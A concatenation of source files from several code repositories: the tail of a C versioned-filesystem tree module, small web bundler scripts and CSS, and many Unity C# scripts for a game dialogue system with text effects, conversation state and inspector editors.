if (S_ISLNK(st.st_mode)) {
PHOENIXFS_DBG("make_fr:: link %s to %s", path, follow);
memset(fr->sha1, 0, 20);
strcpy((char *) fr->follow, follow);
goto END;
}
/* Compute SHA1 of regular and executable files */
if (!(infile = fopen(xpath, "rb")) ||
(sha1_file(infile, st.st_size, sha1) < 0)) {
free(fr);
return NULL;
}
fclose(infile);
memcpy(fr->sha1, sha1, 20);
strcpy((char *) fr->follow, "\0");
END:
fill_fr(fr, &st);
return fr;
}
void fstree_insert_update_file(const char *path, const char *follow)
{
struct dir_record *dr;
struct vfile_record *vfr;
struct file_record *fr = NULL, *new_fr;
uint16_t key = ~0;
char *filename;
size_t length;
filename = split_basename(path, dirname);
if (!(dr = find_dr(dirname)))
goto DR;
else {
length = (size_t) strlen((char *) filename);
key = compute_crc32(key, (const unsigned char *) filename, length);
if (!(vfr = find(dr->vroot, key, 0))) {
PHOENIXFS_DBG("fstree_insert_update_file:: missing vfr: %s", filename);
goto VFR;
}
else {
if (vfr->HEAD >= 0)
fr = vfr->history[vfr->HEAD];
goto FR;
}
}
DR:
dr = make_dr(dirname);
insert_dr(dr);
VFR:
vfr = make_vfr(filename);
insert_vfr(dr, vfr);
FR:
if (!(new_fr = make_fr(path, follow))) {
PHOENIXFS_DBG("fstree_insert_update_file:: Can't make fr %s", path);
return;
}
/* If the content is unchanged from the latest fr, discard the new one */
if (fr && !memcmp(fr->sha1, new_fr->sha1, 20)) {
PHOENIXFS_DBG("fstree_insert_update_file:: unmodified: %s", path);
free(new_fr);
return;
}
insert_fr(vfr, new_fr);
}
void fstree_remove_file(const char *path)
{
struct dir_record *dr;
struct vfile_record *vfr;
uint16_t key = ~0;
size_t length;
char *filename;
int rev;
filename = split_basename(path, dirname);
length = (size_t) strlen((char *) filename);
key = compute_crc32(key, (const unsigned char *) filename, length);
if (!(dr = find_dr(dirname))) {
PHOENIXFS_DBG("fstree_remove_file:: missing %s", dirname);
return;
}
if (!(vfr = find(dr->vroot, key, 0))) {
PHOENIXFS_DBG("fstree_remove_file:: missing %s", filename);
return;
}
for (rev = 0; rev < REV_TRUNCATE; rev++) {
if (!vfr->history[rev])
break;
free(vfr->history[rev]);
}
PHOENIXFS_DBG("fstree_remove_file:: %s", path);
dr->vroot = delete(dr->vroot, key);
}
void fstree_dump_tree(FILE *outfile)
{
dump_dr_tree(fsroot, outfile);
}
void fstree_load_tree(FILE *infile)
{
fsroot = load_dr_tree(infile);
}
void print_fstree(void)
{
node *n = NULL;
int i = 0;
int rank = 0;
int new_rank = 0;
struct node *queue;
FILE *rootlog_fh;
rootlog_fh = fopen("/tmp/phoenixfs.log", "a");
if (fsroot == NULL) {
fprintf(rootlog_fh, "Empty tree.\n");
return;
}
queue = NULL;
enqueue(fsroot);
while (queue != NULL) {
n = dequeue();
if (n->parent != NULL && n == n->parent->pointers[0]) {
new_rank = path_to_root (fsroot, n);
if (new_rank != rank) {
rank = new_rank;
fprintf(rootlog_fh, "\n");
}
}
fprintf(rootlog_fh, "(%lx)", (unsigned long) n);
for (i = 0; i < n->num_keys; i++) {
fprintf(rootlog_fh, "%lx ", (unsigned long) n->pointers[i]);
fprintf(rootlog_fh, "%d ", n->keys[i]);
}
if (!n->is_leaf)
for (i = 0; i <= n->num_keys; i++)
enqueue(n->pointers[i]);
if (n->is_leaf)
fprintf(rootlog_fh, "%lx ", (unsigned long) n->pointers[BTREE_ORDER - 1]);
else
fprintf(rootlog_fh, "%lx ", (unsigned long) n->pointers[n->num_keys]);
fprintf(rootlog_fh, "| ");
}
fprintf(rootlog_fh, "\n");
fclose(rootlog_fh);
}
| sudeepdino008/phoenixfs |
<|start_filename|>web/scripts/build.js<|end_filename|>
const bundler = require("./bundler");
bundler.bundle();
<|start_filename|>web/src/view.css<|end_filename|>
body {
font-size: 14px;
}
.home {
height: 100%;
}
.home .site-header-fixture,
.home .site-header {
background: transparent;
}
.site-header-fixture .site-header {
_position: absolute;
}
.site-header-ghost {
_position: relative;
}
.site-header-fixture a {
line-height: 1;
}
.site-header {
box-shadow: none;
}
.site-header .nav a,
.site-header-ghost .nav a {
padding: 16px 16px;
}
* html .brand {
width: 300px;
}
* html .gmenu {
width: 340px;
}
* html .lang {
width: 130px;
}
.brand a {
display: block;
padding-top: 12px;
color: #fff;
text-decoration: none;
white-space: nowrap;
}
.brand a:hover {
color: #fff;
text-decoration: none;
}
.home .site-body {
height: 100%;
background-image: url(pages/home.jpg);
}
@media screen and (-webkit-min-device-pixel-ratio: 2) {
.home .site-body {
background-image: url(pages/home2x.jpg);
background-size: 1920px 1080px;
}
}
.technology-stack img {
width: 100px;
height: 100px;
}
.panel {
border-width: 1px;
box-shadow: none;
-moz-box-shadow: none;
-webkit-box-shadow: none;
}
.icon {
font-family: "Material Icons";
}
<|start_filename|>web/scripts/serve.js<|end_filename|>
const bundler = require("./bundler");
bundler.serve();
| boiyaa/ie6-compatible-spa |
<|start_filename|>Assets/DialogueSystem/Scripts/Models/Expression.cs<|end_filename|>
namespace DialogueManager.Models
{
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
/// <summary>
/// Different expression faces for the characters
/// </summary>
[System.Serializable]
public class Expression
{
/// <summary> Name of the Character Expression </summary>
[Header( "Expression" )]
public string Name;
/// <summary> Image that will be displayed in the Expression </summary>
public Sprite Image;
/// <summary> Initializes a new instance of the <see cref="Expression"/> class. </summary>
/// <param name="name">Name of the Expression</param>
/// <param name="image">Image showed in the Dialogue</param>
public Expression( string name, Sprite image )
{
this.Image = image;
this.Name = name;
}
/// <summary>
/// Initializes a new instance of the <see cref="Expression"/> class.
/// </summary>
public Expression()
{
this.Name = string.Empty;
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Builders/TextEffectBuilders/AngryEffectBuilder.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public class AngryEffectBuilder : ITextEffectBuilder
{
public TextEffect Build( GameObject gameObject )
{
return new AngryEffect(gameObject);
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/ConversationTriggers/PositionTrigger.cs<|end_filename|>
namespace DialogueManager.GameComponents.Triggers
{
using System;
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
// UGLY CLASS
// TEMPORARY CLASS
// CLASS FOR TESTING
public class PositionTrigger : MonoBehaviour
{
// Quick hacks for testing
public GameObject Tracked;
private bool wasTriggered = false;
private Transform tPosition;
private void Start()
{
tPosition = Tracked.GetComponent<Transform>();
}
private void Update()
{
// More quick hacks for testing
if (tPosition.position.x < this.transform.position.x &&
tPosition.position.y > this.transform.position.y)
{
if (!wasTriggered)
{
wasTriggered = true;
ConversationComponent conversation = this.GetComponent<ConversationComponent>();
if (conversation != null)
{
conversation.Trigger( );
}
}
}
else if (wasTriggered)
{
wasTriggered = false;
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/TextEffects/TextEffect.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public abstract class TextEffect
{
public static Dictionary<string, ITextEffectBuilder> effects = new Dictionary<string, ITextEffectBuilder>
{
{ "normal", null },
{ "angry", new AngryEffectBuilder()},
{ "wave", new WaveEffectBuilder()}
};
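// Illustrative usage (not part of the original source): code that parses an
// effect tag such as "wave" would call effects["wave"].Build(letterObject)
// to attach a WaveEffect to that letter; "normal" maps to null, meaning the
// letter gets no per-character effect.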
public Vector3 m_startPos;
public GameObject gameObject;
public TextEffect(GameObject gameObject )
{
this.gameObject = gameObject;
this.m_startPos = gameObject.transform.localPosition;
}
public abstract void Update();
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/NonComponentEditors/DialogueEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Inspector Editor for the Dialogue
/// </summary>
public class DialogueEditor
{
/// <summary> Index of the displayed element in the dialogue Foldout </summary>
private static int dialogueFoldoutDisplay = -1;
/// <summary>
/// Displays on the Inspector GUI a Dialogue
/// </summary>
/// <param name="dialogue">Dialogue to be displayed</param>
public static void Display( Dialogue dialogue )
{
if (dialogue.Sentences == null)
{
dialogue.Sentences = new List<Sentence>();
}
List<Sentence> sentences = dialogue.Sentences;
EditorGUILayout.LabelField( "Dialogue List", EditorStyles.boldLabel );
EditorGUI.indentLevel++;
for (int i = 0; i < sentences.Count; i++)
{
GUILayout.BeginHorizontal();
bool display = i == dialogueFoldoutDisplay;
display = EditorGUILayout.Foldout( display, "Dialogue" + ( i + 1 ) );
if (GUILayout.Button( EditorButtons.RemoveDialogueButton, EditorStyles.miniButton, EditorButtons.MiniButtonWidth ))
{
sentences.RemoveAt( i );
dialogueFoldoutDisplay = -1;
break;
}
GUILayout.EndHorizontal();
if (!display && i == dialogueFoldoutDisplay)
{
dialogueFoldoutDisplay = -1;
}
if (display)
{
dialogueFoldoutDisplay = i;
EditorGUI.indentLevel++;
SentenceEditor.Display( sentences[i] );
EditorGUI.indentLevel--;
}
}
if (GUILayout.Button( EditorButtons.AddDialogueButton, EditorStyles.miniButton, EditorButtons.NormalButtonWidth ))
{
Sentence newSentence = new Sentence();
sentences.Add( newSentence );
}
EditorGUI.indentLevel--;
}
}
}
<|start_filename|>Assets/TextSeparator/ShakeText.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class ShakeText : MonoBehaviour {
public float Magnitude = 2f;
private Vector3 m_startPos;
private void Start()
{
m_startPos = transform.localPosition;
}
private void Update()
{
float x = Random.Range(-Magnitude, Magnitude);
float y = Random.Range(-Magnitude, Magnitude);
transform.localPosition = m_startPos + new Vector3(x, y, 0.0f);
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Controllers/GameConversationsController.cs<|end_filename|>
namespace DialogueManager.Controllers
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using DialogueManager.GameComponents;
using DialogueManager.Models;
/// <summary>
/// Controller for the GameConversations Component
/// </summary>
public class GameConversationsController
{
/// <summary>
/// Model of the GameConversation
/// </summary>
private GameConversations model;
/// <summary>
/// Initializes a new instance of the <see cref="GameConversationsController"/> class.
/// </summary>
/// <param name="gameConversations">Model of the GameConversations</param>
public GameConversationsController( GameConversations gameConversations )
{
gameConversations.PendingConversations = new Dictionary<string, List<PendingStatus>>();
gameConversations.ConversationsToAdd = new List<PendingStatus>();
this.model = gameConversations;
}
/// <summary>
/// Creates a key in PendingConversations named after the Conversation if it does not exist already.
/// Moves the first element of ConversationsToAdd into the matching PendingConversations list and keeps that list sorted by Importance.
/// </summary>
public void AddConversation()
{
PendingStatus unlockedStatus = this.model.ConversationsToAdd[0];
this.model.ConversationsToAdd.RemoveAt( 0 );
Dictionary<string, List<PendingStatus>> conversations = this.model.PendingConversations;
if (!conversations.ContainsKey( unlockedStatus.ConversationName ))
{
conversations[unlockedStatus.ConversationName] = new List<PendingStatus>();
}
List<PendingStatus> pending = conversations[unlockedStatus.ConversationName];
PendingStatus match = pending.Where( status => status.StatusName == unlockedStatus.StatusName ).FirstOrDefault();
if (match == null)
{
pending.Add( unlockedStatus );
pending.Sort( ( a, b ) => a.Importance.CompareTo( b.Importance ) );
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Controllers/ConversationController.cs<|end_filename|>
namespace DialogueManager.Controllers
{
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using DialogueManager.GameComponents;
using DialogueManager.Models;
using UnityEngine;
/// <summary>
/// Controller for the Conversation Component
/// </summary>
public class ConversationController
{
/// <summary> Model of the Conversation </summary>
private Conversation model;
/// <summary>
/// Initializes a new instance of the <see cref="ConversationController"/> class.
/// </summary>
/// <param name="conversation">Model of the Conversation</param>
public ConversationController(Conversation conversation)
{
conversation.ActiveStatus = conversation.Status[conversation.ActiveStatusIndex];
this.model = conversation;
}
/// <summary>
/// Triggers a Conversation, checking if there is an unlocked Conversation Status and Triggering the correct Status
/// </summary>
/// <param name="dialogueManager">Dialogue Manager where the Dialogue will be displayed</param>
public void Trigger(DialogueManager dialogueManager)
{
var conversations = this.model.GameConversations.PendingConversations;
if (conversations.ContainsKey( this.model.Name ) && conversations[this.model.Name].Count > 0)
{
var statusList = conversations[this.model.Name];
string statusName = statusList[0].StatusName;
statusList.RemoveAt( 0 );
this.model.ActiveStatus = this
.model
.Status
.Where( status => status.Name.Equals( statusName ) )
.First();
this.model.ActiveStatusIndex = this
.model
.Status
.IndexOf( this.model.ActiveStatus );
}
if (this.model.ActiveStatus != null)
{
this.TriggerStatus(dialogueManager);
}
}
/// <summary>
/// Triggers the ActiveStatus and changes it to the NextStatus
/// </summary>
/// <param name="dialogueManager">Dialogue Manager where the Dialogue will be displayed</param>
private void TriggerStatus(DialogueManager dialogueManager)
{
ConversationStatus status = this.model.ActiveStatus;
this.model.GameConversations.ConversationsToAdd.AddRange( status.NewConversations );
dialogueManager.DialogueToShow = status.Dialogue;
this.model.ActiveStatus = status.NextStatus;
this.model.ActiveStatusIndex = status.NextStatusIndex;
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/TextEffects/AngryEffect.cs<|end_filename|>
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public class AngryEffect : TextEffect
{
public float Magnitude = 2f;
public AngryEffect( GameObject gameObject ) : base( gameObject )
{
}
public override void Update()
{
float x = Random.Range( -Magnitude, Magnitude );
float y = Random.Range( -Magnitude, Magnitude );
this.gameObject.transform.localPosition = m_startPos + new Vector3( x, y, 0.0f );
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/CharacterEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEditor;
using UnityEditor.SceneManagement;
using UnityEngine;
/// <summary>
/// Inspector custom editor of the Character Object
/// </summary>
[CustomEditor( typeof( Character ) )]
public class CharacterEditor : Editor
{
/// <summary>
/// When the GUI is displayed
/// </summary>
public override void OnInspectorGUI()
{
EditorGUI.BeginChangeCheck();
serializedObject.Update();
Character character = ( Character )this.target;
character.Name = EditorGUILayout.TextField( "Name", character.Name );
character.Voice = EditorGUILayout.ObjectField( "Voice", character.Voice, typeof( AudioClip ), true ) as AudioClip;
EditorGUILayout.Space();
EditorGUILayout.LabelField( "Expression List", EditorStyles.boldLabel );
if (character.Expressions == null)
{
character.Expressions = new List<Expression>();
}
ExpressionEditor.Display( character.Expressions );
if (GUILayout.Button( EditorButtons.AddExpressionButton, EditorStyles.miniButton, EditorButtons.NormalButtonWidth ))
{
Expression newExpression = new Expression();
character.Expressions.Add( newExpression );
}
if (EditorGUI.EndChangeCheck())
{
serializedObject.ApplyModifiedProperties();
EditorUtility.SetDirty( this.target );
EditorSceneManager.MarkSceneDirty( EditorSceneManager.GetActiveScene() );
}
}
}
}
<|start_filename|>Assets/TextSeparator/WaveText.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class WaveText : MonoBehaviour
{
public float Frequency = 8.0f;
public float Magnitude = 1.5f;
public float Offset;
private Vector3 m_startPos;
private void Start()
{
m_startPos = transform.localPosition;
}
private void Update()
{
float y = Mathf.Sin((Offset + Time.time) * Frequency) * Magnitude;
transform.localPosition = m_startPos + new Vector3(0.0f, y, 0.0f);
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/NonComponentEditors/ExpressionEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Inspector Editor for the Conversation Status List
/// </summary>
public class ExpressionEditor
{
/// <summary> Index of the displayed element in the expression List </summary>
private static int expressionFoldoutDisplay = -1;
/// <summary>
/// Displays on the Inspector GUI a List of Expressions
/// </summary>
/// <param name="expressions">Expression List</param>
public static void Display(List<Expression> expressions)
{
for (int i = 0; i < expressions.Count; i++)
{
bool display = i == expressionFoldoutDisplay;
display = EditorGUILayout.Foldout( display, expressions[i].Name );
if (!display && i == expressionFoldoutDisplay)
{
expressionFoldoutDisplay = -1;
}
if (display)
{
expressionFoldoutDisplay = i;
EditorGUILayout.BeginVertical( GUI.skin.box );
GUILayout.BeginHorizontal();
expressions[i].Name = EditorGUILayout.TextField( "Expression Name", expressions[i].Name );
if (GUILayout.Button( EditorButtons.RemoveExpressionButton, EditorStyles.miniButton, EditorButtons.MiniButtonWidth ))
{
expressions.RemoveAt( i );
expressionFoldoutDisplay = -1;
return;
}
GUILayout.EndHorizontal();
expressions[i].Image = EditorGUILayout.ObjectField( "Image", expressions[i].Image, typeof( Sprite ), true ) as Sprite;
EditorGUILayout.EndVertical();
}
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/DialogueManagerComponent.cs<|end_filename|>
namespace DialogueManager.GameComponents
{
using System.Collections;
using System.Collections.Generic;
using DialogueManager.Controllers;
using DialogueManager.Models;
using UnityEngine;
using UnityEngine.UI;
/// <summary>
/// This class manages the text in the dialogues, the transition between sentences, animations, and such
/// </summary>
public class DialogueManagerComponent : MonoBehaviour
{
/// <summary> Model of the Dialogue Manager </summary>
public DialogueManager Model;
/// <summary> Controller of the Dialogue Manager </summary>
private DialogueManagerController controller;
/// <summary>
/// Is executed when the object is instantiated
/// </summary>
private void Awake()
{
GameObject gameConversations = Instantiate( this.Model.GameConversationsPrefab );
gameConversations.name = "GameConversations";
/*
GameObject canvasObject = new GameObject( "DialogueCanvas", typeof(RectTransform) );
Canvas canvas = canvasObject.AddComponent<Canvas>();
canvas.renderMode = RenderMode.WorldSpace;
*/
Transform canvasObject = GameObject.Find( "DialogueCanvas" ).GetComponent<Transform>();
GameObject dialogueBox = Instantiate( this.Model.CanvasObjectsPrefab );
dialogueBox.transform.position = new Vector3( -250, 0, 0 );
dialogueBox.name = "DialogueBox";
dialogueBox.transform.SetParent( canvasObject.transform );
dialogueBox.GetComponent<RectTransform>().localPosition = new Vector3( 0, -500, 0 );
this.Model.DialogueStartPoint = GameObject.Find( "/DialogueCanvas/DialogueBox/DialogueStartPoint" ).GetComponent<Transform>();
this.Model.ImageText = GameObject.Find( "/DialogueCanvas/DialogueBox/CharacterImage" ).GetComponent<Image>();
this.Model.Animator = GameObject.Find( "/DialogueCanvas/DialogueBox" ).GetComponent<Animator>();
this.Model.Source = this.GetComponent<AudioSource>();
this.controller = new DialogueManagerController( this.Model );
}
/// <summary>
/// Checks if there is something in the model to display and if there was an input
/// </summary>
private void Update()
{
if ( this.Model.DialogueToShow != null )
{
this.StartDialogue();
}
if ( Input.GetKeyDown( this.Model.NextKey ) && this.Model.Finished && this.Model.DoubleTap )
{
this.DisplayNextSentence();
this.Model.Finished = false;
}
if ( Input.GetKeyDown( this.Model.NextKey ) && this.Model.DoubleTap == false )
{
this.Model.Finished = true;
this.DisplayNextSentence();
}
}
/// <summary>
/// Start new dialogue, and reset all data from previous dialogues
/// </summary>
private void StartDialogue()
{
this.controller.StartDialogue();
this.DisplayNextSentence();
}
/// <summary>
/// Display next sentence in dialogue
/// </summary>
private void DisplayNextSentence()
{
this.StopAllCoroutines();
if ( this.controller.DisplayNextSentence() )
{
this.StartCoroutine( this.controller.TypeSentence() );
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/ConversationStatus.cs<|end_filename|>
namespace DialogueManager.Models
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
/// <summary>
/// Status of a conversation, each status contains the Dialogue that will be displayed one after another.
/// </summary>
[System.Serializable]
public class ConversationStatus
{
/// <summary>
/// Name of the Status.
/// </summary>
public string Name;
/// <summary>
/// Index of the NextStatus in the Conversation Status List
/// </summary>
public int NextStatusIndex;
/// <summary>
/// The complete Dialogue which will be displayed.
/// </summary>
public Dialogue Dialogue;
/// <summary>
/// The List of the unlocked <see cref="ConversationStatus"/> in other Conversations.
/// </summary>
public List<PendingStatus> NewConversations;
/// <summary>
/// Gets or sets the <see cref="ConversationStatus"/> in which the Conversation will be once the Dialogue of the current Status ends.
/// </summary>
public ConversationStatus NextStatus { get; set; }
}
}
<|start_filename|>Assets/MovementSystem/Scripts/PlayerMovement.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class PlayerMovement : MonoBehaviour {
private Rigidbody2D rBody;
private Animator animator;
public int SpeedMultiplier = 1;
void Start () {
rBody = GetComponent<Rigidbody2D>();
animator = GetComponent<Animator>();
}
void Update () {
Vector2 movement_vector = new Vector2(Input.GetAxisRaw("Horizontal"), Input.GetAxisRaw("Vertical"));
if(movement_vector != Vector2.zero) {
animator.SetBool( "isWalking", true );
animator.SetFloat( "input_x", movement_vector.x );
animator.SetFloat( "input_y", movement_vector.y );
}
else {
animator.SetBool( "isWalking", false );
}
rBody.MovePosition( rBody.position + movement_vector * Time.deltaTime * SpeedMultiplier);
}
}
<|start_filename|>Assets/MovementSystem/Scripts/CameraFollow.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class CameraFollow : MonoBehaviour {
public Transform target;
public float Speed = 0.1f;
private Camera myCam;
void Start () {
myCam = GetComponent<Camera>();
}
void FixedUpdate () {
myCam.orthographicSize = (Screen.height / 1000f) ;
if (target) {
transform.position = Vector3.Lerp(transform.position, target.position, Speed)
+ new Vector3(0, 0, -10);
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Classes/Character.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DialogueManager.Models;
/// <summary>
/// A character scriptable object, can be created in Unity Editor
/// </summary>
[CreateAssetMenu( fileName = "New Character", menuName = "Character" )]
public class Character : ScriptableObject
{
/// <summary> Name of the <see cref="Character"/> </summary>
public string Name;
/// <summary> List of <see cref="Expression"/> of the <see cref="Character"/>. </summary>
public List<Expression> Expressions;
/// <summary> Sound that will be played each time a letter or character is added to the dialogue display </summary>
public AudioClip Voice;
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/Letter.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
using UnityEngine.UI;
public class Letter
{
public float Speed;
public char Character;
public TextEffect Effect;
public bool isActive;
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/ConversationComponent.cs<|end_filename|>
namespace DialogueManager.GameComponents
{
using System;
using System.Collections;
using System.Collections.Generic;
using DialogueManager.Controllers;
using DialogueManager.Models;
using UnityEngine;
/// <summary>
/// Conversation Component, must be added for every single NPC or Situation that has a Conversation
/// </summary>
public class ConversationComponent : MonoBehaviour
{
/// <summary> Model of the Conversation </summary>
public Conversation Model;
/// <summary> Controller of the Conversation </summary>
private ConversationController controller;
/// <summary>
/// Triggers the Conversation, displaying the Active Status.
/// </summary>
public void Trigger()
{
this.Model.GameConversations = GameObject
.Find( "GameConversations" )
.GetComponent<GameConversationsComponent>()
.Model;
DialogueManager dialogueManager = GameObject
.Find( "DialogueManager" )
.GetComponent<DialogueManagerComponent>()
.Model;
this.controller.Trigger( dialogueManager );
}
/// <summary> Creation of the Controller </summary>
private void Awake()
{
this.controller = new ConversationController( this.Model );
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/NonComponentEditors/ConversationStatusEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Inspector Editor for the Conversation Status List
/// </summary>
public class ConversationStatusEditor
{
/// <summary> Index of the displayed element in the status Foldout </summary>
private static int statusFoldoutDisplay = -1;
/// <summary> List of ConversationStatus being displayed </summary>
private static List<ConversationStatus> status;
/// <summary> Array with the names of all the Status </summary>
private static string[] statusNames;
/// <summary>
/// Displays on the Inspector GUI a List of Conversation Status
/// </summary>
/// <param name="status">List of Conversation Status</param>
/// <param name="statusListNames">Array containing the Names of each Conversation Status</param>
public static void Display( List<ConversationStatus> status, string[] statusListNames )
{
ConversationStatusEditor.status = status;
ConversationStatusEditor.statusNames = statusListNames;
for (int i = 0; i < status.Count; i++)
{
bool display = i == statusFoldoutDisplay;
display = EditorGUILayout.Foldout( display, status[i].Name );
if (!display && i == statusFoldoutDisplay)
{
statusFoldoutDisplay = -1;
}
if (display)
{
EditorGUILayout.BeginVertical( GUI.skin.box );
DisplayNameAndRemoveButton( i );
DisplayNextStatus( i );
DialogueEditor.Display( status[i].Dialogue );
NewConversationsEditor.Display( status[i].NewConversations );
EditorGUILayout.EndVertical();
}
}
}
/// <summary>
/// Displays the Name and the Remove Button of the Conversation Status on the Inspector
/// </summary>
/// <param name="i">Index in the List of the Status</param>
private static void DisplayNameAndRemoveButton( int i )
{
statusFoldoutDisplay = i;
GUILayout.BeginHorizontal();
status[i].Name = EditorGUILayout.TextField( "Status Name", status[i].Name );
if (GUILayout.Button( EditorButtons.RemoveStatusButton, EditorStyles.miniButton, EditorButtons.MiniButtonWidth ))
{
status.RemoveAt( i );
statusFoldoutDisplay = -1;
return;
}
GUILayout.EndHorizontal();
}
/// <summary>
/// Displays a Dropdown menu for the user to select the Status to be the next one after the current
/// </summary>
/// <param name="i">Index in the List of the Status</param>
private static void DisplayNextStatus( int i )
{
if (status[i].NextStatusIndex >= status.Count)
{
status[i].NextStatusIndex = 0;
}
status[i].NextStatusIndex = EditorGUILayout.Popup(
"Next Status",
status[i].NextStatusIndex,
statusNames,
EditorStyles.popup );
status[i].NextStatus = status[status[i].NextStatusIndex];
}
}
}
<|start_filename|>Assets/TextSeparator/TextSeparator.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
public class TextSeparator : MonoBehaviour {
public string text = "YO CUANDO QUIROZ NO VA A LA GRADUACION";
public Font font;
public Material material;
void Start()
{
for (int i = 0; i < text.Length; i++){
GameObject newGO = new GameObject(text[i].ToString());
newGO.transform.SetParent(this.transform);
Text myText = newGO.AddComponent<Text>();
RectTransform parentTransform = GetComponentInParent<RectTransform>();
myText.text = text[i].ToString();
myText.alignment = TextAnchor.LowerCenter;
myText.font = font;
myText.material = material;
//myText.GetComponent<RectTransform>().localPosition = new Vector3(parentTransform.localPosition.x + (i*17) , parentTransform.localPosition.y, myText.rectTransform.localPosition.z);
myText.GetComponent<RectTransform>().localPosition = new Vector3( i * 17 , 0, 0);
myText.fontSize = 40;
myText.color = new Color(1f, 0.0f, 0.0f,1.0f);
//newGO.AddComponent<ShakeText>();
newGO.AddComponent<WaveText>();
newGO.GetComponent<WaveText>().Offset = .15f * i;
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/EditorButtons.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
/// <summary>
/// Static public values of the buttons for the Editors
/// </summary>
public class EditorButtons
{
/// <summary> Width of a normal Button </summary>
public static GUILayoutOption NormalButtonWidth = GUILayout.Width( 85f );
/// <summary> Width of a Mini Button </summary>
public static GUILayoutOption MiniButtonWidth = GUILayout.Width( 24f );
/// <summary> Add Status Editor GUI Button </summary>
public static GUIContent AddStatusButton = new GUIContent( "Add", "Add Status" );
/// <summary> Remove Status Editor GUI Button </summary>
public static GUIContent RemoveStatusButton = new GUIContent( "-", "Remove Status" );
/// <summary> Add Dialogue Editor GUI Button </summary>
public static GUIContent AddDialogueButton = new GUIContent( "Add", "Add Dialogue" );
/// <summary> Remove Dialogue Editor GUI Button </summary>
public static GUIContent RemoveDialogueButton = new GUIContent( "-", "Remove Dialogue" );
/// <summary> Add Pending Status Button </summary>
public static GUIContent AddPendingStatusButton = new GUIContent( "Add", "Add PendingStatus" );
/// <summary> Remove Pending Status Button </summary>
public static GUIContent RemovePendingStatusButton = new GUIContent( "-", "Remove PendingStatus" );
/// <summary> Add Expression Button </summary>
public static GUIContent AddExpressionButton = new GUIContent( "Add", "Add Expression" );
/// <summary> Remove Expression Button </summary>
public static GUIContent RemoveExpressionButton = new GUIContent( "-", "Remove Expression" );
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Builders/TextEffectBuilders/ITextEffectBuilder.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public interface ITextEffectBuilder
{
TextEffect Build(GameObject gameObject);
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/ConversationEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using System.Linq;
using DialogueManager.GameComponents;
using DialogueManager.Models;
using UnityEditor;
using UnityEditor.SceneManagement;
using UnityEngine;
/// <summary>
/// Inspector custom editor of the Conversation Component
/// </summary>
[CustomEditor( typeof( ConversationComponent ) )]
public class ConversationEditor : Editor
{
/// <summary>
/// When the GUI is displayed
/// </summary>
public override void OnInspectorGUI()
{
EditorGUI.BeginChangeCheck();
serializedObject.Update();
ConversationComponent conversationComponent = ( ConversationComponent )target;
Conversation model = conversationComponent.Model;
model.Name = EditorGUILayout.TextField( "Name", model.Name );
if (model.Status == null)
{
model.Status = new List<ConversationStatus>();
}
if (model.Status.Count > 0)
{
string[] statusListNames = model.Status.Select( s => s.Name ).ToArray();
model.ActiveStatusIndex = EditorGUILayout.Popup(
"Active Status",
model.ActiveStatusIndex,
statusListNames,
EditorStyles.popup );
model.ActiveStatus = model.Status[model.ActiveStatusIndex];
EditorGUILayout.Space();
EditorGUILayout.LabelField( "Status List", EditorStyles.boldLabel );
ConversationStatusEditor.Display( model.Status, statusListNames );
}
if (GUILayout.Button( EditorButtons.AddStatusButton, EditorStyles.miniButton, EditorButtons.NormalButtonWidth ))
{
ConversationStatus newStatus = new ConversationStatus();
newStatus.Name = "Status " + ( model.Status.Count + 1 );
model.Status.Add( newStatus );
}
